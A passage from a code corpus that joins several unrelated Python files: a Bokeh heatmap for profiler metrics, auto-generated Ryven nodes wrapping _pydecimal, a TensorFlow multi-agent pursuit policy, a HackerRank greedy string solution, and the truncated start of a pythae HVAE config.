self.start = 0
if endtime == None:
# get timestamp of latest file and events
self.last_timestamp_system_metrics = (
self.metrics_reader.get_timestamp_of_latest_available_file()
)
else:
self.last_timestamp_system_metrics = endtime
events = self.metrics_reader.get_events(starttime, self.last_timestamp_system_metrics)
self.plot_height = plot_height
# get timestamp of latest file and events
self.last_timestamp = self.metrics_reader.get_timestamp_of_latest_available_file()
self.system_metrics = self.preprocess_system_metrics(events, system_metrics={})
self.create_plot()
def preprocess_system_metrics(self, events, system_metrics):
# read all available system metric events and store them in dict
for event in events:
if event.node_id not in system_metrics:
system_metrics[event.node_id] = {}
if event.dimension not in system_metrics[event.node_id]:
system_metrics[event.node_id][event.dimension] = {}
if event.name not in system_metrics[event.node_id][event.dimension]:
system_metrics[event.node_id][event.dimension][event.name] = []
system_metrics[event.node_id][event.dimension][event.name].append(event.value)
# number of datapoints
self.width = np.inf
# preprocess data
for node in system_metrics:
for dimension in system_metrics[node]:
if dimension not in self.available_dimensions:
self.available_dimensions.append(dimension)
for event in system_metrics[node][dimension]:
# list of available events
if event not in self.available_events:
self.available_events.append(event)
# convert to numpy
system_metrics[node][dimension][event] = np.array(
system_metrics[node][dimension][event]
)
# we may not have the exact same number of measurements per metric
if system_metrics[node][dimension][event].shape[0] < self.width:
self.width = system_metrics[node][dimension][event].shape[0]
# convert metrics to percentages
if dimension in ["Algorithm", "Platform", ""]:
max_value = np.max(system_metrics[node][dimension][event])
if max_value != 0:
system_metrics[node][dimension][event] = (
system_metrics[node][dimension][event] / max_value
)
system_metrics[node][dimension][event] = (
system_metrics[node][dimension][event] * 100
)
# compute total utilization per event dimension
for node in system_metrics:
for dimension in system_metrics[node]:
n = len(system_metrics[node][dimension])
total = [sum(x) for x in zip(*system_metrics[node][dimension].values())]
system_metrics[node][dimension]["total"] = np.array(total) / n
self.available_events.append("total")
nodes = list(system_metrics.keys())
system_metrics["node_total"] = {}
# compute total utilization per worker node
for dimension in system_metrics[nodes[0]]:
system_metrics["node_total"][dimension] = {}
node_total = []
for node in nodes:
len2 = len(node_total)
if len2 > 0:
len1 = system_metrics[node][dimension]["total"].shape[0]
if len1 < len2:
node_total[:len1] = (
node_total[:len1] + system_metrics[node][dimension]["total"]
)
else:
node_total = node_total + system_metrics[node][dimension]["total"][:len2]
else:
node_total = deepcopy(system_metrics[node][dimension]["total"])
system_metrics["node_total"][dimension]["total"] = node_total / (len(nodes))
# filter events and dimensions
self.filtered_events = []
print(f"select events:{self.select_events}")
self.filtered_dimensions = []
print(f"select dimensions:{self.select_dimensions}")
for metric in self.select_events:
r = re.compile(r".*" + metric)
self.filtered_events.extend(list(filter(r.search, self.available_events)))
self.filtered_events = set(self.filtered_events)
print(f"filtered_events:{self.filtered_events}")
for metric in self.select_dimensions:
r = re.compile(metric) # + r".*")
self.filtered_dimensions.extend(list(filter(r.search, self.available_dimensions)))
self.filtered_dimensions = set(self.filtered_dimensions)
print(f"filtered_dimensions:{self.filtered_dimensions}")
return system_metrics
def create_plot(self):
# define list of metric names (needed for tooltip)
tmp = []
metric_names = []
yaxis = {}
for node in self.system_metrics:
for dimension in self.system_metrics[node]:
if dimension in self.filtered_dimensions:
for event in self.system_metrics[node][dimension]:
if event in self.filtered_events:
values = self.system_metrics[node][dimension][event][: self.width]
tmp.append(values)
metric_names.append(dimension + "_" + event + "_" + node)
yaxis[len(tmp)] = dimension + "_" + event + "_" + node
ymax = len(tmp)
yaxis[ymax] = ""
# define figure
start = 0
if self.width > 1000:
start = self.width - 1000
self.plot = figure(
plot_height=self.plot_height,
x_range=(start, self.width),
y_range=(0, ymax),
plot_width=1000,
tools="crosshair,reset,xwheel_zoom, box_edit",
)
self.plot.xaxis.axis_label = "Indices"
# tooltip
hover = HoverTool(
tooltips=[("usage", "@image"), ("metric", "@metric"), ("index", "$x{10}")]
)
# map colors to values between 0 and 100
color_mapper = bokeh.models.LinearColorMapper(bokeh.palettes.viridis(100))
color_mapper.high = 100
color_mapper.low = 0
tmp = np.array(tmp)
# create column data source
self.source = ColumnDataSource(
data=dict(
image=[np.array(tmp[i]).reshape(1, -1) for i in range(len(tmp))],
x=[0] * ymax,
y=[i for i in range(ymax)],
dw=[self.width] * (ymax),
dh=[1.3] * (ymax),
metric=[i for i in metric_names],
)
)
# heatmap placeholder
images = Image(image="image", x="x", y="y", dw="dw", dh="dh", color_mapper=color_mapper)
# plot
self.plot.add_glyph(self.source, images)
self.plot.add_tools(hover)
self.plot.xgrid.visible = False
self.plot.ygrid.visible = False
self.plot.yaxis.ticker = FixedTicker(ticks=np.arange(0, ymax).tolist())
self.plot.yaxis.major_label_text_font_size = "7pt"
self.plot.yaxis.major_label_overrides = yaxis
self.plot.xaxis.major_label_text_font_size = "0pt"
self.target = show(self.plot, notebook_handle=True)
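# Hedged usage note (not part of the original module): Heatmap only needs a
# metrics reader exposing get_events(start, end) and
# get_timestamp_of_latest_available_file(); for example (reader class name
# assumed here, not verified):
#   from smdebug.profiler.system_metrics_reader import S3SystemMetricsReader
#   view = Heatmap(S3SystemMetricsReader("s3://bucket/job-prefix"),
#                  select_dimensions=[".*CPU", ".*GPU"], select_events=["total"])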
|
Ryven/packages/auto_generated/_pydecimal/nodes.py | tfroehlich82/Ryven | 2,872 | 11090303 | <filename>Ryven/packages/auto_generated/_pydecimal/nodes.py
from NENV import *
import _pydecimal
class NodeBase(Node):
pass
class _All_Zeros_Node(NodeBase):
"""
Matches zero or more characters at the beginning of the string."""
title = '_all_zeros'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='string'),
NodeInputBP(label='pos', dtype=dtypes.Data(default=0, size='s')),
NodeInputBP(label='endpos', dtype=dtypes.Data(default=9223372036854775807, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._all_zeros(self.input(0), self.input(1), self.input(2)))
class _Convert_For_Comparison_Node(NodeBase):
"""
Given a Decimal instance self and a Python object other, return
a pair (s, o) of Decimal instances such that "s op o" is
equivalent to "self op other" for any of the 6 comparison
operators "op".
"""
title = '_convert_for_comparison'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='other'),
NodeInputBP(label='equality_op', dtype=dtypes.Data(default=False, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._convert_for_comparison(self.input(0), self.input(1)))
class _Convert_Other_Node(NodeBase):
"""
Convert other to Decimal.
Verifies that it's ok to use in an implicit construction.
If allow_float is true, allow conversion from float; this
is used in the comparison methods (__eq__ and friends).
"""
title = '_convert_other'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='other'),
NodeInputBP(label='raiseit', dtype=dtypes.Data(default=False, size='s')),
NodeInputBP(label='allow_float', dtype=dtypes.Data(default=False, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._convert_other(self.input(0), self.input(1), self.input(2)))
class _Dec_From_Triple_Node(NodeBase):
"""
Create a decimal instance directly, without any validation,
normalization (e.g. removal of leading zeros) or argument
conversion.
This function is for *internal use only*.
"""
title = '_dec_from_triple'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='sign'),
NodeInputBP(label='coefficient'),
NodeInputBP(label='exponent'),
NodeInputBP(label='special', dtype=dtypes.Data(default=False, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dec_from_triple(self.input(0), self.input(1), self.input(2), self.input(3)))
class _Decimal_Lshift_Exact_Node(NodeBase):
"""
Given integers n and e, return n * 10**e if it's an integer, else None.
The computation is designed to avoid computing large powers of 10
unnecessarily.
>>> _decimal_lshift_exact(3, 4)
30000
>>> _decimal_lshift_exact(300, -999999999) # returns None
"""
title = '_decimal_lshift_exact'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='n'),
NodeInputBP(label='e'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._decimal_lshift_exact(self.input(0), self.input(1)))
class _Dexp_Node(NodeBase):
"""
Compute an approximation to exp(c*10**e), with p decimal places of
precision.
Returns integers d, f such that:
10**(p-1) <= d <= 10**p, and
(d-1)*10**f < exp(c*10**e) < (d+1)*10**f
In other words, d*10**f is an approximation to exp(c*10**e) with p
digits of precision, and with an error in d of at most 1. This is
almost, but not quite, the same as the error being < 1ulp: when d
= 10**(p-1) the error could be up to 10 ulp."""
title = '_dexp'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='e'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dexp(self.input(0), self.input(1), self.input(2)))
class _Div_Nearest_Node(NodeBase):
"""
Closest integer to a/b, a and b positive integers; rounds to even
in the case of a tie.
"""
title = '_div_nearest'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='a'),
NodeInputBP(label='b'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._div_nearest(self.input(0), self.input(1)))
class _Dlog_Node(NodeBase):
"""
Given integers c, e and p with c > 0, compute an integer
approximation to 10**p * log(c*10**e), with an absolute error of
at most 1. Assumes that c*10**e is not exactly 1."""
title = '_dlog'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='e'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dlog(self.input(0), self.input(1), self.input(2)))
class _Dlog10_Node(NodeBase):
"""
Given integers c, e and p with c > 0, p >= 0, compute an integer
approximation to 10**p * log10(c*10**e), with an absolute error of
at most 1. Assumes that c*10**e is not exactly 1."""
title = '_dlog10'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='e'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dlog10(self.input(0), self.input(1), self.input(2)))
class _Dpower_Node(NodeBase):
"""
Given integers xc, xe, yc and ye representing Decimals x = xc*10**xe and
y = yc*10**ye, compute x**y. Returns a pair of integers (c, e) such that:
10**(p-1) <= c <= 10**p, and
(c-1)*10**e < x**y < (c+1)*10**e
in other words, c*10**e is an approximation to x**y with p digits
of precision, and with an error in c of at most 1. (This is
almost, but not quite, the same as the error being < 1ulp: when c
== 10**(p-1) we can only guarantee error < 10ulp.)
We assume that: x is positive and not equal to 1, and y is nonzero.
"""
title = '_dpower'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='xc'),
NodeInputBP(label='xe'),
NodeInputBP(label='yc'),
NodeInputBP(label='ye'),
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._dpower(self.input(0), self.input(1), self.input(2), self.input(3), self.input(4)))
class _Exact_Half_Node(NodeBase):
"""
Matches zero or more characters at the beginning of the string."""
title = '_exact_half'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='string'),
NodeInputBP(label='pos', dtype=dtypes.Data(default=0, size='s')),
NodeInputBP(label='endpos', dtype=dtypes.Data(default=9223372036854775807, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._exact_half(self.input(0), self.input(1), self.input(2)))
class _Format_Align_Node(NodeBase):
"""
Given an unpadded, non-aligned numeric string 'body' and sign
string 'sign', add padding and alignment conforming to the given
format specifier dictionary 'spec' (as produced by
parse_format_specifier).
"""
title = '_format_align'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='sign'),
NodeInputBP(label='body'),
NodeInputBP(label='spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._format_align(self.input(0), self.input(1), self.input(2)))
class _Format_Number_Node(NodeBase):
"""
Format a number, given the following data:
is_negative: true if the number is negative, else false
intpart: string of digits that must appear before the decimal point
fracpart: string of digits that must come after the point
exp: exponent, as an integer
spec: dictionary resulting from parsing the format specifier
This function uses the information in spec to:
insert separators (decimal separator and thousands separators)
format the sign
format the exponent
add trailing '%' for the '%' type
zero-pad if necessary
fill and align if necessary
"""
title = '_format_number'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='is_negative'),
NodeInputBP(label='intpart'),
NodeInputBP(label='fracpart'),
NodeInputBP(label='exp'),
NodeInputBP(label='spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._format_number(self.input(0), self.input(1), self.input(2), self.input(3), self.input(4)))
class _Format_Sign_Node(NodeBase):
"""
Determine sign character."""
title = '_format_sign'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='is_negative'),
NodeInputBP(label='spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._format_sign(self.input(0), self.input(1)))
class _Group_Lengths_Node(NodeBase):
"""
Convert a localeconv-style grouping into a (possibly infinite)
iterable of integers representing group lengths.
"""
title = '_group_lengths'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='grouping'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._group_lengths(self.input(0)))
class _Iexp_Node(NodeBase):
"""
Given integers x and M, M > 0, such that x/M is small in absolute
value, compute an integer approximation to M*exp(x/M). For 0 <=
x/M <= 2.4, the absolute error in the result is bounded by 60 (and
is usually much smaller)."""
title = '_iexp'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='x'),
NodeInputBP(label='M'),
NodeInputBP(label='L', dtype=dtypes.Data(default=8, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._iexp(self.input(0), self.input(1), self.input(2)))
class _Ilog_Node(NodeBase):
"""
Integer approximation to M*log(x/M), with absolute error boundable
in terms only of x/M.
Given positive integers x and M, return an integer approximation to
M * log(x/M). For L = 8 and 0.1 <= x/M <= 10 the difference
between the approximation and the exact result is at most 22. For
L = 8 and 1.0 <= x/M <= 10.0 the difference is at most 15. In
both cases these are upper bounds on the error; it will usually be
much smaller."""
title = '_ilog'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='x'),
NodeInputBP(label='M'),
NodeInputBP(label='L', dtype=dtypes.Data(default=8, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._ilog(self.input(0), self.input(1), self.input(2)))
class _Insert_Thousands_Sep_Node(NodeBase):
"""
Insert thousands separators into a digit string.
spec is a dictionary whose keys should include 'thousands_sep' and
'grouping'; typically it's the result of parsing the format
specifier using _parse_format_specifier.
The min_width keyword argument gives the minimum length of the
result, which will be padded on the left with zeros if necessary.
If necessary, the zero padding adds an extra '0' on the left to
avoid a leading thousands separator. For example, inserting
commas every three digits in '123456', with min_width=8, gives
'0,123,456', even though that has length 9.
"""
title = '_insert_thousands_sep'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='digits'),
NodeInputBP(label='spec'),
NodeInputBP(label='min_width', dtype=dtypes.Data(default=1, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._insert_thousands_sep(self.input(0), self.input(1), self.input(2)))
class _Log10_Digits_Node(NodeBase):
"""
Given an integer p >= 0, return floor(10**p)*log(10).
For example, self.getdigits(3) returns 2302.
"""
title = '_log10_digits'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='p'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._log10_digits(self.input(0)))
class _Log10_Lb_Node(NodeBase):
"""
Compute a lower bound for 100*log10(c) for a positive integer c."""
title = '_log10_lb'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='c'),
NodeInputBP(label='correction', dtype=dtypes.Data(default={'1': 100, '2': 70, '3': 53, '4': 40, '5': 31, '6': 23, '7': 16, '8': 10, '9': 5}, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._log10_lb(self.input(0), self.input(1)))
class _Namedtuple_Node(NodeBase):
"""
Returns a new subclass of tuple with named fields.
>>> Point = namedtuple('Point', ['x', 'y'])
>>> Point.__doc__ # docstring for the new class
'Point(x, y)'
>>> p = Point(11, y=22) # instantiate with positional args or keywords
>>> p[0] + p[1] # indexable like a plain tuple
33
>>> x, y = p # unpack like a regular tuple
>>> x, y
(11, 22)
>>> p.x + p.y # fields also accessible by name
33
>>> d = p._asdict() # convert to a dictionary
>>> d['x']
11
>>> Point(**d) # convert from a dictionary
Point(x=11, y=22)
>>> p._replace(x=100) # _replace() is like str.replace() but targets named fields
Point(x=100, y=22)
"""
title = '_namedtuple'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='typename'),
NodeInputBP(label='field_names'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._namedtuple(self.input(0), self.input(1)))
class _Nbits_Node(NodeBase):
"""
Number of bits necessary to represent self in binary.
>>> bin(37)
'0b100101'
>>> (37).bit_length()
6"""
title = '_nbits'
type_ = '_pydecimal'
init_inputs = [
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._nbits())
class _Normalize_Node(NodeBase):
"""
Normalizes op1, op2 to have the same exp and length of coefficient.
Done during addition.
"""
title = '_normalize'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='op1'),
NodeInputBP(label='op2'),
NodeInputBP(label='prec', dtype=dtypes.Data(default=0, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._normalize(self.input(0), self.input(1), self.input(2)))
class _Parse_Format_Specifier_Node(NodeBase):
"""
Parse and validate a format specifier.
Turns a standard numeric format specifier into a dict, with the
following entries:
fill: fill character to pad field to minimum width
align: alignment type, either '<', '>', '=' or '^'
sign: either '+', '-' or ' '
minimumwidth: nonnegative integer giving minimum width
zeropad: boolean, indicating whether to pad with zeros
thousands_sep: string to use as thousands separator, or ''
grouping: grouping for thousands separators, in format
used by localeconv
decimal_point: string to use for decimal point
precision: nonnegative integer giving precision, or None
type: one of the characters 'eEfFgG%', or None
"""
title = '_parse_format_specifier'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='format_spec'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._parse_format_specifier(self.input(0)))
class _Parser_Node(NodeBase):
"""
Matches zero or more characters at the beginning of the string."""
title = '_parser'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='string'),
NodeInputBP(label='pos', dtype=dtypes.Data(default=0, size='s')),
NodeInputBP(label='endpos', dtype=dtypes.Data(default=9223372036854775807, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._parser(self.input(0), self.input(1), self.input(2)))
class _Rshift_Nearest_Node(NodeBase):
"""
Given an integer x and a nonnegative integer shift, return closest
integer to x / 2**shift; use round-to-even in case of a tie.
"""
title = '_rshift_nearest'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='x'),
NodeInputBP(label='shift'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._rshift_nearest(self.input(0), self.input(1)))
class _Sqrt_Nearest_Node(NodeBase):
"""
Closest integer to the square root of the positive integer n. a is
an initial approximation to the square root. Any positive integer
will do for a, but the closer a is to the square root of n the
faster convergence will be.
"""
title = '_sqrt_nearest'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='n'),
NodeInputBP(label='a'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal._sqrt_nearest(self.input(0), self.input(1)))
class Getcontext_Node(NodeBase):
"""
Returns this thread's context.
If this thread does not yet have a context, returns
a new context and sets this thread's context.
New contexts are copies of DefaultContext.
"""
title = 'getcontext'
type_ = '_pydecimal'
init_inputs = [
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal.getcontext())
class Localcontext_Node(NodeBase):
"""
Return a context manager for a copy of the supplied context
Uses a copy of the current context if no context is specified
The returned context manager creates a local decimal context
in a with statement:
def sin(x):
with localcontext() as ctx:
ctx.prec += 2
# Rest of sin calculation algorithm
# uses a precision 2 greater than normal
return +s # Convert result to normal precision
def sin(x):
with localcontext(ExtendedContext):
# Rest of sin calculation algorithm
# uses the Extended Context from the
# General Decimal Arithmetic Specification
return +s # Convert result to normal context
>>> setcontext(DefaultContext)
>>> print(getcontext().prec)
28
>>> with localcontext():
... ctx = getcontext()
... ctx.prec += 2
... print(ctx.prec)
...
30
>>> with localcontext(ExtendedContext):
... print(getcontext().prec)
...
9
>>> print(getcontext().prec)
28
"""
title = 'localcontext'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='ctx', dtype=dtypes.Data(default=None, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal.localcontext(self.input(0)))
class Setcontext_Node(NodeBase):
"""
Set this thread's context to context."""
title = 'setcontext'
type_ = '_pydecimal'
init_inputs = [
NodeInputBP(label='context'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _pydecimal.setcontext(self.input(0)))
export_nodes(
_All_Zeros_Node,
_Convert_For_Comparison_Node,
_Convert_Other_Node,
_Dec_From_Triple_Node,
_Decimal_Lshift_Exact_Node,
_Dexp_Node,
_Div_Nearest_Node,
_Dlog_Node,
_Dlog10_Node,
_Dpower_Node,
_Exact_Half_Node,
_Format_Align_Node,
_Format_Number_Node,
_Format_Sign_Node,
_Group_Lengths_Node,
_Iexp_Node,
_Ilog_Node,
_Insert_Thousands_Sep_Node,
_Log10_Digits_Node,
_Log10_Lb_Node,
_Namedtuple_Node,
_Nbits_Node,
_Normalize_Node,
_Parse_Format_Specifier_Node,
_Parser_Node,
_Rshift_Nearest_Node,
_Sqrt_Nearest_Node,
Getcontext_Node,
Localcontext_Node,
Setcontext_Node,
)
|
pursuit_policy.py | SurvivorT/SRTP | 489 | 11090318 | <filename>pursuit_policy.py
import numpy as np
import tensorflow as tf
from rltools import nn, tfutil
from rltools.distributions import Distribution
from rltools.policy.stochastic import StochasticPolicy
class FactoredCategorical(Distribution):
def __init__(self, dim):
self._dim = dim
@property
def dim(self):
        return self._dim
def entropy(self, probs_N_H_K):
tmp = -probs_N_H_K * np.log(probs_N_H_K)
tmp[~np.isfinite(tmp)] = 0
return tmp.sum(axis=2)
def sample(self, probs_N_H_K):
"""Sample from N factored categorical distributions"""
N, H, K = probs_N_H_K.shape
return np.array(
[[np.random.choice(K, p=probs_N_H_K[i, j, :]) for j in range(H)] for i in xrange(N)])
def kl_expr(self, logprobs1_B_N_A, logprobs2_B_N_A, name=None):
"""KL divergence between facotored categorical distributions"""
with tf.op_scope([logprobs1_B_N_A, logprobs2_B_N_A], name, 'fac_categorical_kl') as scope:
kl_B = tf.reduce_sum(
tf.reduce_sum(
tf.exp(logprobs1_B_N_A) * (logprobs1_B_N_A - logprobs2_B_N_A), 2), 1,
name=scope)
return kl_B
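# Hedged illustration (not part of the original module): FactoredCategorical
# treats an (N, H, K) probability array as N batches of H independent K-way
# categorical distributions, e.g.
#   dist = FactoredCategorical(dim=3)
#   probs = np.full((2, 4, 3), 1.0 / 3.0)   # 2 samples, 4 factors, 3 actions each
#   dist.sample(probs).shape == (2, 4)      # entries drawn from {0, 1, 2}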
class PursuitCentralMLPPolicy(StochasticPolicy):
def __init__(self, obsfeat_space, action_space, n_agents, hidden_spec, enable_obsnorm, tblog,
varscope_name):
self.hidden_spec = hidden_spec
self._n_agents = n_agents
self._dist = FactoredCategorical(action_space.n)
super(PursuitCentralMLPPolicy, self).__init__(obsfeat_space, action_space, action_space.n,
enable_obsnorm, tblog, varscope_name)
@property
def distribution(self):
return self._dist
def _make_actiondist_ops(self, obsfeat_B_Df):
with tf.variable_scope('hidden'):
net = nn.FeedforwardNet(obsfeat_B_Df, self.obsfeat_space.shape, self.hidden_spec)
with tf.variable_scope('out'):
out_layer = nn.AffineLayer(net.output, net.output_shape, (self.action_space.n,),
initializer=tf.zeros_initializer)
scores_B_NPa = out_layer.output
scores_B_N_Pa = tf.reshape(scores_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
actiondist_B_N_Pa = scores_B_N_Pa - tfutil.logsumexp(scores_B_N_Pa, axis=2)
actiondist_B_NPa = tf.reshape(actiondist_B_N_Pa, (-1, self.action_space.n))
return actiondist_B_NPa
def _make_actiondist_logprobs_ops(self, actiondist_B_NPa, input_actions_B_N):
actiondist_B_N_Pa = tf.reshape(actiondist_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
logprob_B_N = tfutil.lookup_last_idx(actiondist_B_N_Pa, input_actions_B_N)
return tf.reduce_sum(logprob_B_N, 1) # Product of probabilities
def _make_actiondist_kl_ops(self, proposal_actiondist_B_NPa, actiondist_B_NPa):
proposal_actiondist_B_N_Pa = tf.reshape(proposal_actiondist_B_NPa,
(-1, self._n_agents,
self.action_space.n / self._n_agents))
actiondist_B_N_Pa = tf.reshape(actiondist_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
return self.distribution.kl_expr(proposal_actiondist_B_N_Pa, actiondist_B_N_Pa)
def _sample_from_actiondist(self, actiondist_B_NPa, deterministic=False):
actiondist_B_N_Pa = np.reshape(actiondist_B_NPa,
(-1, self._n_agents, self.action_space.n / self._n_agents))
probs_B_N_A = np.exp(actiondist_B_N_Pa)
assert probs_B_N_A.ndim == 3
assert probs_B_N_A.shape[2] == self.action_space.n / self._n_agents
if deterministic:
action_B_N = np.argmax(probs_B_N_A, axis=2)
else:
action_B_N = self.distribution.sample(probs_B_N_A)
assert action_B_N.ndim == 2 and action_B_N.shape[-1] == self._n_agents
return action_B_N
def _compute_actiondist_entropy(self, actiondist_B_NPa):
actiondist_B_N_Pa = actiondist_B_NPa.reshape(
(-1, self._n_agents, self.action_space.n / self._n_agents))
return self.distribution.entropy(np.exp(actiondist_B_N_Pa))
|
Greedy Algorithm/ReverseShuffleMerge.py | WinterSoldier13/interview-preparation-kit | 175 | 11090332 | <filename>Greedy Algorithm/ReverseShuffleMerge.py
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
# Complete the reverseShuffleMerge function below.
def reverseShuffleMerge(s):
word = []
freqs = Counter(s)
reqs = { k: v/2 for k, v in freqs.items()} # required letters
avail_skips = { k: v/2 for k, v in freqs.items()} # available skips
skipped = [] # short history of letters that have been skipped
for c in reversed(s):
# No longer need this character so skip
if reqs[c] == 0:
continue
# Skip current character if possible
if avail_skips[c] > 0:
avail_skips[c] -= 1
skipped.append(c) # track history of skipped chars to add back in to the word later
### Can no longer skip current character
## If history of skipped chars is empty then just add the current character
elif len(skipped) == 0:
word.append(c)
## Else add back all skipped characters from cheapest to current letter
else:
i = 0
skipped.append(c)
avail_skips[c] -= 1
min_c = chr(ord('a') - 1)
while i < len(skipped):
# find the cheapest skipped character
i = index_of(skipped, find_min_bounded(skipped, i, min_c), i)
sc = skipped[i]
# if this skipped character (sc) is already fulfilled go to next cheapest
if reqs[sc] == 0:
min_c = sc
continue
# process the current sc
word.append(sc)
reqs[sc] -= 1
avail_skips[sc] += 1
i += 1
# if the sc is at the current character
# we've processed one instance of it making it skippable again ... so break
if sc == c:
break
# clear out all skipped characters that we've already processed
skipped = skipped[i:]
return ''.join(word)
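# Hedged self-check (not part of the original submission): for the HackerRank
# sample s = "eggegg", half of each letter count ({'e': 1, 'g': 2}) must remain
# in the answer, and the reverse greedy scan above yields "egg".
def _sample_check():
    assert reverseShuffleMerge("eggegg") == "egg"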
def find_min_bounded(arr, start, min_c):
m = 'z'
for i in range(start, len(arr)):
if arr[i] < m and arr[i] > min_c:
m = arr[i]
return m
def index_of(arr, v, start):
for i in range(start, len(arr)):
if arr[i] == v:
return i
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = reverseShuffleMerge(s)
fptr.write(result + '\n')
fptr.close() |
src/pythae/models/hvae/hvae_config.py | clementchadebec/benchmark_VAE | 143 | 11090345 | <gh_stars>100-1000
from pydantic.dataclasses import dataclass
from ..vae import VAEConfig
@dataclass
class HVAEConfig(VAEConfig):
